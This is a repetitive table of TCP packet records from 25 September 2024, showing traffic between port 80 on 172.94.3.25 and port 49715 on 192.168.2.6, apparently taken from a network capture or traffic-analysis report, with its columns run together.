                        Sep 25, 2024 16:03:23.430425882 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430445910 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430447102 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430447102 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430457115 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430468082 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430479050 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430490971 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430495024 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430495024 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430501938 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430514097 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430525064 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430536032 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430536985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430547953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430557966 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430566072 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430566072 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430568933 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430582047 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430593014 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430603981 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430609941 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430609941 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430617094 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430628061 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430639982 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430650949 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430653095 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430653095 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430665016 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430676937 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430679083 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430686951 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430700064 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430711031 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430715084 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430723906 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430737019 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430741072 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430741072 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430759907 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430775881 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430787086 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430797100 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430802107 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430805922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430805922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430818081 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430830002 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430836916 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430841923 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.430877924 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.430877924 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.431397915 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517338991 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517368078 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517380953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517391920 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517404079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517416000 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517429113 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517441034 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517452955 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517462969 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517473936 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517486095 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517515898 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517528057 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517539978 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517539978 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517546892 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517559052 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517579079 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517600060 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517605066 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517605066 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517611027 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517621994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517640114 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517651081 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517661095 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517663956 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517663956 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517683029 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517692089 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517704010 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517715931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517723083 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517723083 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517735958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517748117 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517766953 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517766953 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517767906 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517780066 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517791033 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517818928 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517829895 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517838955 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517838955 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517841101 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517859936 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517872095 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517882109 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517890930 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517890930 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517894983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517915964 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517926931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517936945 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517946005 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517946005 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.517951012 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517975092 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.517992020 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518002987 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518013954 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518013954 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518016100 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518029928 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518042088 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518054962 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518058062 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518059015 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518100977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518119097 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518137932 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518148899 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518150091 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518150091 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518160105 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518172026 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518183947 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518196106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518205881 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518205881 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518208027 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518323898 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518335104 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518353939 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518353939 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518353939 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518363953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518376112 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518408060 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518408060 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518452883 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518464088 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518475056 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518486023 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518497944 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518508911 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518511057 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518511057 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518522024 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518537998 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518548012 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518559933 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518570900 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518579960 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518579960 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518582106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518593073 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518604994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518644094 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518644094 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518703938 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518713951 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518726110 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518758059 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518769979 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518779993 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518789053 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518789053 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518791914 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518805027 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518831968 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518831968 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518831968 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518906116 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518918991 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518930912 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518943071 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.518965006 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.518965006 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519026041 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519037008 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519049883 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519081116 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519081116 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519167900 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519180059 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519191980 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519210100 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519222021 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519233942 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519252062 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519264936 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519268990 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519268990 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519277096 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519289017 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519305944 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519315958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519328117 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519340992 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519364119 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519375086 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519390106 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519390106 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519396067 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519429922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519429922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519490957 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519503117 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519515038 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519526958 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.519553900 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519553900 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.519615889 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.522006035 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.578800917 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.605752945 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605853081 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605873108 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605885983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605899096 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605922937 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605926991 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.605926991 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.605945110 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605957985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605969906 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605983973 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.605988979 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.605988979 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.605995893 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606008053 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606034994 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606055021 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606056929 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606056929 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606065989 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606091976 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606102943 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606115103 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606127977 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606133938 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606133938 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606141090 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606152058 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606165886 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606178045 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606178999 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606178999 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606215000 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606234074 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606245995 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606245995 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606307983 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606319904 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606331110 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606343985 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606359005 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606364012 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606364012 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606369019 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606380939 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606393099 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606410027 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606410027 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606419086 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606431007 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606441975 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606455088 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606476068 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606476068 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606491089 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606503010 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606514931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606525898 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606539011 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606545925 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606545925 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606586933 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606609106 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606621027 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606632948 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606637955 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606637955 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606647015 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606661081 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606672049 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606683969 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606683969 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606684923 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606761932 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606774092 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606785059 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606802940 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606802940 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606806040 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606817961 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606827974 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606841087 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606853008 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606859922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606859922 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606874943 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606884956 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606895924 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606905937 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606913090 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606944084 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606944084 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.606987953 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.606997967 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607008934 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607023001 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607040882 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607042074 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607053995 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607065916 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607084036 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607084036 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607088089 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607099056 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607111931 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607124090 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607135057 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607142925 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607142925 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607170105 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607191086 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607203007 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607213974 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607220888 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607220888 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607225895 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607286930 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607297897 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607309103 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607316971 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607316971 CEST4971580192.168.2.6172.94.3.25
                        Sep 25, 2024 16:03:23.607320070 CEST8049715172.94.3.25192.168.2.6
                        Sep 25, 2024 16:03:23.607331038 CEST8049715172.94.3.25192.168.2.6
